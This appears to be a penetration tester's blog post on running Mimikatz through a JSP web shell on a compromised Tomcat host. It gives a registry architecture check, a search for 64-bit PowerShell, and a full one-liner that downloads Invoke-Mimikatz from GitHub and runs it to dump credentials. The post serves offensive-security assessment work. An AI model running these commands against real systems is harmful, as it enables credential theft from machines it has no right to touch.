Whiteboard Wednesday: Using Mimikatz From a JSP shell

A while back I was messing around with Tomcat and it got me thinking when I come across Tomcat during assessments it is normally running as system or some kind of admin account. Sometimes I don’t want to/cant use metasploit and I just have the web shell. I could create a user and log in that way but one of the first things I would do is run Mimikatz so why not just do it form the web shell nothing stopping you really so I compiled some commands that would let me run the Invoke-Mimikatz powershell commandlet. Later I then decided to should make the commands automated in a JSP file going forward and I did which can be found here


So here is a quick run though of what I was doing:

1. Determine the architecture, because if the system is x64 and Tomcat is the x86 the powershell launched will be 32-bit and Invoke-Mimikatz won’t work since it cant read the 64-bit lssas process’’. The way I did this was a quick registry query the command is:

reg query "HKLMSYSTEMCurrentControlSetControlSession ManagerEnvironment" /v PROCESSOR_ARCHITECTURE

2. Find the appropriate install of powershell if it is a 64-bit system. According to multiple sources the 64-bit powershell should be at


but on none of the systems I tested on had powershell there so I had to go looking for it. After some poking around i noticed that on all of my 64-bit test systems there was a folder that started with


followed by hashes and version information that had the 64-bit powershell which could call. The command I use to find the powershell exe is:

dir /S %windir%\powershell.exe.

3. After the appropriate powershell instance is found I then run Invoke-Mimikatz.ps1 file by executing the file after downloading it from either Github

or a local copy if you cant reach external addresses by using:

powershell "IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds"

Previous Article
Pwning Networks Through Vulnerable Applications
Pwning Networks Through Vulnerable Applications

If you are a pentester, you would agree that one of the most common ways of compromising a network is throu...

Next Article
Firewall, Router and Switch Configuration Review
Firewall, Router and Switch Configuration Review

The presentation provides a topical overview of the areas to be looked at when conducting a Firewall, Route...